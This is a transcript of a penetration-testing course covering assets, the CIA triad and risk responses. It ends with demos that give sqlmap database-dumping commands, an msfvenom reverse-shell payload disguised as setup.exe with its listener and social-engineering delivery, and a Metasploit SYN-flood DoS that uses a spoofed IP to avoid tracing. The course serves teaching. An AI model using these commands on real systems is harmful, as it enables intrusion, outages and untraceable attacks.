The simplest example could be that there is a folder on a server that contains various
critical files. The owner of that folder is the CEO of the organization. However,
there is a designated person in the IT team who manages that folder for the CEO,
which means that person assigns or removes access for individuals as and when
directed by the CEO.
Let's now look at different types of assets. There can be different types. The first
one we can talk about is people. These are the employees, nonemployees, which
means they are third-party vendors, consultants, and contractors. Moving on, an asset could be hardware, which means system devices, networking devices, or peripherals that are available on the network. Then you have software, which includes applications. Now applications could be custom made. They could be freeware, open source, or off-the-shelf. Whatever your organization is using, that becomes an asset as long as it is in software form. Then
comes the data, which is the information. Now data could be of two types. It could
be digital, it could be paper.
When you talk about digital information or digital data, it can be transmitted,
stored, processed, or archived. Now all these formats, no matter how it is stored or
how it is processed, archived or transmitted, that data or the information is the
asset. Same goes for paper. Now if there is a legal compliance that you need to
follow to keep the information in the paper form, that you have to very carefully
ensure that paper data or the information on the paper is secured properly.
Moving on, then you have the physical environment, which could be a building or the infrastructure of the organization. It can include offices, electricity, and air conditioning. Then come the processes. Along with processes, you also have procedures and policies. Each organization will have standard IT and business procedures, processes, and policies.
Now these have to be considered a type of asset, because an organization could have standard procedures and policies and it could also have sensitive procedures and policies. Depending on what type of procedures, policies, or processes you are dealing with, some of them can be made public and some need to remain confidential within the organization.
Then you have third parties, which could also include your vendors and
contractors. And this is not only related to IT services. It can also be related to
guards, legal services, or online services that you have adopted. It could be
something like Dropbox or Gmail or Hotmail that you are using. Then finally come the communication channels, which could be messaging servers in the form of e-mail, or file-sharing services that you are using.
Let's now look at the CIA Triad and how it fits in when dealing with information. The first one is confidentiality, which means that information is available only on a need-to-know basis. So if you do not have access to something, you will not be able to access that particular folder or file on the network. Then comes integrity, which means information is protected from any type of unauthorized tampering or modification.
Finally, availability, which means information is available as and when required to
the designated individuals. This goes back to confidentiality, meaning that if you
are not the designated individual, you will not have access to the information.
Let's now look at the dangers to various types of assets. The first one is people. When talking about people, if they have been the victim of a social engineering attack, they
can disclose or leak out the information. [Video description begins] In the onscreen
diagram, “Leaked, disclosure” falls under the following heading:
Confidentiality. [Video description ends]
People can also alter the integrity of the information, which means they alter or
modify the data. The data can also be stolen from people or data could be
accidentally or intentionally deleted. [Video description begins] In the onscreen
diagram, “Stolen, deleted” falls under the following heading: Availability. [Video
description ends]
When you talk about hardware, it is mainly a matter of availability that impacts it. So hardware could be stolen, it could be destroyed, or it could fail. For example, a server holding critical data, which does not have a backup, unfortunately fails. So the availability of the data is lost. Then you move on to software. As far as confidentiality is concerned, with software, the data can be altered or it could be infected with malware. Let's take the example of a database. Using a tool like sqlmap, you can connect to the back-end database of a web application and alter the information. Now the integrity of the data can also be compromised, which means somebody has made an unauthorized copy of the data. The availability of the data can also be in danger when the data is either corrupted or intentionally or accidentally deleted.
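To make the sqlmap example a bit more concrete, here is a minimal, hypothetical sketch of what such a session could look like; the URL, parameter, database, and table names below are placeholders invented for illustration and are not values from the demo:

# Probe a vulnerable GET parameter and enumerate the back-end databases
sqlmap -u "http://intranet.example.com/products.php?id=1" --batch --dbs

# Dump a table from a discovered database (names are placeholders)
sqlmap -u "http://intranet.example.com/products.php?id=1" -D shopdb -T users --dump

# Open an interactive SQL shell, from which data could even be altered
sqlmap -u "http://intranet.example.com/products.php?id=1" --sql-shell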
Now let's look at how data or information is impacted in terms of confidentiality, integrity, and availability. The confidentiality of data can be impacted by unauthorized access. Remember, going back to the definition of confidentiality, it is only on a need-to-know basis. Now if you do not have access to a particular folder on the network and you by some means gain access to that particular folder, you have made an unauthorized access. So the confidentiality of the data is in danger.
Now how is integrity impacted? Somebody can modify the data. Or there is a version change of a particular document that you are not aware of or that was not supposed to be made. The document version changes, but it is an unintentional change.
Then comes the availability of data. Data could be deleted, or access to it could simply be denied to a particular individual who needs to have access. When you talk about the physical environment, it is the availability that is most impacted. There could be a break-in or there could be destruction, which could impact the office or the servers that are located within the premises.
Then you move ahead to processes. Now the integrity of a process can be impacted if the process is altered without permission, which means the process was not supposed to be changed but it has been changed. Even somebody not following the process impacts the integrity of the process. For example, there is a specific process you have to follow when you set up a server; if you do not follow that process, the integrity of the process is in danger.
Then comes availability. Now if processes are not available, then there is a problem, and these processes have to be available at the time that they are required. A simple example could be that a new person has joined the IT team but has not been briefed about the IT processes. He goes and sets up a web application without knowing the process. So for this person, the process was not available.
Let's now move to third parties. How is confidentiality impacted? A vendor could gain unauthorized access to a particular folder or file on the network. Integrity gets impacted when the vendor or the contractor modifies the data and changes the version of a file.
Availability is impacted when the vendor or the third-party individual, who could be a consultant or a contractor as well, deletes a particular file or changes the access
permission on a particular folder or file. [Video description begins] In the onscreen
diagram, this third-party danger is written as follows: Deleted, access
denied. [Video description ends]
Moving on to communication channels, confidentiality is impacted when you read a message that you are not supposed to read. For instance, you are fixing somebody's laptop, let's say a senior official's laptop in your organization, and Outlook is open; a confidential message comes in from the CEO. You open that message and you read it. Now the confidentiality of that message is lost.
When you talk about integrity, there is unauthorized capture. Say you are part of the IT team and you are capturing the flow of information that is happening on the network. For instance, you are doing packet capture and you are recording those packets for later analysis. Meanwhile, somebody is accessing a website that runs on the HTTP protocol. Now because the communication is happening in clear text, you are able to not only record the information but also capture the username and password of this individual.
Availability is impacted when you delete or destroy the communication channel or
its output, something like an e-mail. So if there is a critical e-mail that you delete,
then the availability of that communication channel is destroyed.
Types of Risk Responses
[Video description begins] Topic title: Types of Risk Responses. Your host for this
session is Ashish Chugh. [Video description ends]
There are different definitions of risk; it can be defined in a generic way or in the context of information security. Essentially, risk is the potential of losing something that has a value, and it may be high or low based on the situation. For example, a system exposed to the Internet has a higher risk of threats compared to a system that is not exposed to the Internet.
Risk does not exist in the present; it is always in the future. Therefore, it impacts future events. In a generic sense, a risk is a potential problem that may or may not happen. Another way to define risk is as the potential of an action or activity that results in an undesirable outcome or a loss. For example, there is a risk of financial loss due to an attack conducted by a hacker. We also have to understand that risk cannot always be eliminated; there will always be one risk or another.
Depending on the current state of the organization or of the infrastructure, and the type of security that you have implemented, there will be one or more risks that are always present. For instance, take the example of a firewall. What could be the risk associated with having a single firewall to filter the incoming and the outgoing traffic? The risk is that the firewall can fail. That may or may not happen, but it is a risk. So how do you address that risk? You put a redundant firewall in place. That is how you can mitigate that particular risk.
Let's now look at some risk examples. Risks are unavoidable and they can relate to everything in day-to-day life. For example, if you are driving a car at a very high speed, there are chances that an accident will take place. That is the risk in this situation. Another example, in the context of information security: if your antivirus application is not updated, then there is a risk that malware will get into the system.
Let's look at a few more examples. The first one is non-compliance with a policy, which we can assume is a security policy. The risk is that users may not follow the security policy. Then you have loss of information or data. A server's hard drive failing is a risk in this situation, which can cause the loss of information or data.
There is also the risk of a Denial of Service, or DoS, attack. If your infrastructure, meaning the servers, the endpoints, and the firewall, is not protected or configured properly, there are chances that there will be a DoS attack. Then we come to an information breach, which is a risk if there are no proper access control permissions defined. Then there are floods. A flood is also a risk. If your office is situated in a city near a river, the sea, or the ocean, then there are chances that a flood may happen. This is a risk.
Let's now look at risk-based frameworks. A risk-based framework is also known as a risk-based approach. Risk management is an ongoing process that aims at minimizing risk and losses to the organization. There are several phases in the risk management process which cover the risk-based approach. When you follow the risk management process accurately and strategically, you enable the organization to improve its decision-making capabilities regarding risks.
When you are talking about the risk-based framework, which is part of the risk management process, you have to decide what is important to protect. In this step, you define the boundaries within which the risk-based decisions are made. You have to identify the assets, categorize them, evaluate them, and prioritize them.
By doing so, you narrow down which assets are the most critical to protect and which are not. You then have to identify the threats and vulnerabilities that impact these particular assets.
Then you have to determine how to protect the assets. In this step, you use the risk management process to examine the impact of threats and vulnerabilities on the assets in the context of the system environment. You also have to determine the risks faced by the assets. This entire set of activities is part of the risk assessment process, which is a critical step in developing an effective risk management strategy. In this process, we need to know how to protect our assets from the threats.
Later, you move to risk control, which is the application of controls to reduce the risks to an organization's data and information systems. The goal is to identify which approach is more adequate or appropriate to protect the assets and the information. You have to prioritize, evaluate, and implement the approaches and risk control measures identified in the risk assessment process.
Then finally, you move to risk monitoring, which is to monitor and improve the controls. There are multiple reasons why you would want to do this. When you are monitoring risks, you have to keep track of identified risks, monitor them, and identify new risks. You also have to determine the effectiveness of the executed risk response plan in reducing risks.
Finally, you also have to ensure that the risk management policies and methods are in compliance with the organization's mission and objectives, which means that you cannot define a risk management strategy that does not align with the organization's mission and objectives. You have to ensure that everything is aligned: your risk management processes and methods are in sync with the organization's business objectives and vision.
So how do you improve the controls after that? This is an iterative step in which you continue to test the controls that you have implemented, and by these controls I am being very specific about the security controls. You have to continue to evaluate your assets and see if there are vulnerabilities that still exist in the system. And then, if those vulnerabilities exist, you have to apply better controls.
Let's now understand the types of risk responses. There are different types of risk responses that you can have against a particular risk. It is up to you, depending on the situation, how you want to handle a particular risk, or rather how you want to respond to it. It could be risk reduction, risk avoidance, risk transfer, or risk acceptance. Let's first look at risk reduction. This is the most common method to manage risks. In this method, you put control measures in place to reduce the impact of the risk.
The second method is risk avoidance. Risk avoidance is ideally the best way to go in some situations. In this method, you eliminate all those activities or unwanted situations that can expose assets to risks in the first place. It includes the complete elimination of all the vulnerabilities in the system, which in a realistic situation is not possible. Therefore, risk avoidance is good in some situations, but it may not work out in all situations.
Then we talk about risk acceptance. There are times when the cost of a countermeasure is too high and the loss due to a particular risk is relatively small. In that case, the organization might simply accept the risk and take no action against it, because the loss is very low in comparison to the countermeasure you would have to put in place. However, it is generally not recommended that you accept a risk.
But in certain situations you would have to do that, and if you do, then you must also properly document the risk and review it regularly to ensure that the potential loss is within the limits of what your organization can accept. Typically, you would go with risk acceptance when you know the countermeasure is either very difficult to implement, costs too much, or is very time consuming. After all, the longer the time, the more cost you are going to incur.
Therefore, you always look at the cost of implementing a countermeasure to a risk. If it is too high and the risk is very low in comparison, then you might as well accept the risk. Finally, we look at risk transfer. This is a method where the responsibility to address potential damage due to a risk is transferred to a third party. This could be a third-party vendor or a third-party service provider to whom you simply pass on the responsibility of addressing the risk.
Let's now look at some examples. The first example is risk reduction. So how do you reduce a risk? By installing a badge system, for instance. Why would you want to install a badge system at the entry of your building? Because you want to reduce the risk of unauthorized entry. If you do not have a badge, you cannot simply walk into the building or your office. With a badge system in place, you have to swipe your badge to make an authorized entry.
Another example is installing a firewall. You reduce the risk of the network being attacked if you install a firewall. If you do not install one, then the risk, and the probability of an attack taking place on the network, is very high.
Let's now look at examples of risk avoidance. Let's assume you have been handed a complex project. How do you handle that complex project? One option is to simply go ahead and do it, but that is not risk avoidance. Risk avoidance in this scenario would be to change the scope of the project, reduce the complexity, and then continue with the project.
Another example could be buying a commercial product. In this situation, you avoid the risk of using an open-source product. And how are you avoiding the risk in this scenario? Open-source products typically do not have regular updates or upgrades, or in most cases there is no particular entity that owns the open-source product. In such a scenario, you do not know where to get the updates, and if you find a bug, you don't know who is going to fix it.
So instead, you avoid this risk and go for a commercial product of a similar nature. Now there is an organization that owns the product. You have paid a fee to buy the product or use its services. Therefore, you have avoided the risk of not getting updates or regular upgrades.
Let's now talk about risk acceptance. One example could be an approved deviation from a security policy. There is a security policy in the organization, and everybody has to adhere to it. If a deviation is happening and you take an approval to deviate from the security policy, that means you are accepting the risk which may arise due to this particular deviation. If the management is fine with it and has okayed the deviation, that means they are also accepting the risk.
Now let's assume that you have an in-house built application and you find a small bug. You accept the risk because it is going to take a lot of time for your team to fix that bug and release a new update of the application, and you do not find the time and the money worth spending on fixing that particular bug.
More specifically, if you know this particular application is hosted only on the intranet and is not visible to or hosted on the Internet, then you know that you can very well accept that risk. The attack cannot happen on that particular application directly from the Internet. So you are ready to accept that bug and live with the risk.
Let's now look at risk transfer examples. One of the biggest examples would be purchasing insurance. So you purchase insurance for your infrastructure. If an earthquake or anything else happens and your infrastructure is destroyed, then you know there is insurance. Even though you will not be able to get the data back, at least the hardware infrastructure can be purchased again if there is insurance. So here you have transferred the risk associated with that particular infrastructure to a third party, which is the insurance company.
Let's also consider another scenario where, in a project, you have come across a complex task. You do not think that your team has the capability to handle that complex task, or they may take a long time to complete it. In this case, you can simply transfer the risk of completing this complex task to a third party.
MSFvenom
[Video description begins] Topic title: MSFvenom. Your host for this session is Ashish Chugh. [Video description ends]
In this demo, we will be using a tool called MSFvenom, which is designed to create custom payloads. [Video description begins] The Kali Linux application is open. [Video description ends] You already have a tool called Metasploit Framework in Kali Linux that has several predefined payloads, but with MSFvenom you can create a custom payload without getting into Metasploit Framework. MSFvenom combines two tools that were earlier available separately, known as MSFpayload and MSFencode.
To be able to use MSFvenom, you simply need to open the terminal window; detailed help is available with MSFvenom. So you type the command msfvenom -h. You will see a lot of parameters, or switches, that you can use. We will use some of these parameters, or switches, in the next command that we are going to execute to create a custom payload.
Before creating the custom payload, note that there are several payloads already available in MSFvenom that you can use as the basis for your own custom payload. Let's see some of these. Clear the window and type the command msfvenom -l payloads. You get a complete list of the payloads that you can use to create your own custom payload. Let's create a custom
payload. Type the following command: msfvenom -p
windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o setup.exe.
Now in this particular command, we have used various parameters. So let's look at
-p. [Video description begins] The presenter types the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o
setup.exe. [Video description ends] If you need to use a payload module that is already predefined in MSFvenom, you select it with the -p parameter; -f defines the output file format, and -o specifies the name of the output file, which is setup.exe here.
Let's execute this command and note the output. It has created setup.exe as the payload. Since there was no architecture defined, it chooses x86 as the default architecture for the payload. The payload size is 341 bytes, and the final size of the exe file is 73802 bytes. Saved as...So let's verify that this file has been created. We execute the command ls -l. Note that setup.exe has indeed been created.
Next you need to use social engineering or any other method to deploy this setup.exe to the target system. For instance, you can use a USB drive: copy this file onto the USB drive, plug it into the target system, and execute it from there. Then start msfconsole in the Metasploit Framework on your own machine and wait for the Meterpreter session, which gives you access to the target system (a minimal sketch of that handler setup follows below). Another option is to simply host this file on a web server and let the target download the file so that it can be executed. So that's it for the MSFvenom demo. We are done with it, and thank you very much.
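The demo does not show the listener side, but as a minimal sketch, assuming you run msfconsole on the same Kali machine that built the payload, the matching handler would typically be configured along these lines. The lines starting with # are annotations for readability, and LHOST and LPORT must match the values baked into setup.exe:

# Use the generic payload handler module
use exploit/multi/handler
# Match the payload and connection details used when building setup.exe
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.4
set LPORT 4444
# Start listening; a Meterpreter session opens when the target runs setup.exe
exploit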
Metasploit Framework
[Video description begins] Topic title: Metasploit Framework. Your host for this session is Ashish Chugh. [Video description ends]
In this demo, we are going to use Metasploit Framework, which is a penetration
testing framework. It is widely used by hackers and pentesters across the world. It is part of Kali Linux and can also be downloaded separately from the Metasploit Framework website. [Video description begins] The Kali Linux application is open. It comprises a "Favorites" bar that includes the Metasploit Framework icon. [Video description ends]
To be able to use Metasploit Framework, you need to first start it, so click on the Metasploit Framework icon. [Video description begins] A terminal opens. [Video description ends] It does the initial configuration. First it starts the database; then it creates a user called msf; creates a database, msf, and then another database called msf_test; then it creates the configuration file and the initial database schema.
Once all this is done, you get to see the msf5 prompt. If you notice, just above the prompt, it says 1914 exploits and 556 payloads. Now this number may vary. As and when you update Kali Linux or the Metasploit Framework, the number is likely to change. So let's get started.
Metasploit Framework can be used in different ways to exploit a system. You can simply gain control of the system, or you can even bring it down by initiating a denial-of-service attack. It depends on what your intent is, but this is the tool that you definitely want to use. So in this demo, we are going to perform a denial-of-service, or DoS, attack on a Windows 10 system. To keep the demo within scope, we are only going to use Kali Linux and Metasploit Framework.
So let's use the following commands. You first need to use the use command to select a specific module. So we type the command use auxiliary/dos/tcp/synflood. This particular module has now been selected. Next we need to set the target host. For this, we use the set RHOST command; let's say the IP address of the target system is 192.168.43.198, so we use the command set RHOST 192.168.43.198.
Now we need to set the port that we want to target. So we use the command set RPORT; let's say it is port 21, which is FTP. [Video description begins] The presenter types the following command: set RPORT 21. [Video description ends] Now, if you do not spoof your own IP address, it is most likely that the attack can be traced back to you, so it is better to spoof your IP address. We will do that with the command set SHOST, followed by any random IP address. So this has been done.
We can also set the timeout; let's say 50000. So use the command set TIMEOUT 50000. We are all set; now we simply have to type exploit. If the system on the other end, 192.168.43.198, is alive and port 21 is open, it will go down in no time, because there will be SYN flooding happening to that system, which will eventually drain the system of its resources, and the system is likely to go down. So this is one simple method of bringing down a system. This is also known as exploiting the system. The commands used are summarized below. That's it for this demo. Thank
you.
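For reference, here are the msfconsole commands from this demo collected in one place. The SHOST value below is a placeholder from the documentation address range, since the presenter only says to type any random IP address; the lines starting with # are annotations rather than commands to type:

# Select the SYN flood auxiliary module
use auxiliary/dos/tcp/synflood
# Target host and port (FTP in this demo)
set RHOST 192.168.43.198
set RPORT 21
# Spoof the source address so the flood is harder to trace back (placeholder value)
set SHOST 203.0.113.25
# Timeout value chosen in the demo
set TIMEOUT 50000
# Launch the SYN flood against the target
exploit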
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the role of penetration testing and how it fits into a security program. We did this by covering the need for pen testing and how it fits into a security program. We also learned about the pen testing mindset and how it affects security, looked at the different levels of penetration testing, and focused on the weaknesses of penetration testing.
Later in the course, we also learned about the types of tools that can be used for penetration testing. So this concludes the Security Consultant journey. In the next course, we will learn about the forensic analyst role. [Video description begins] The following information is displayed on screen: End-User Security Awareness. [Video description ends]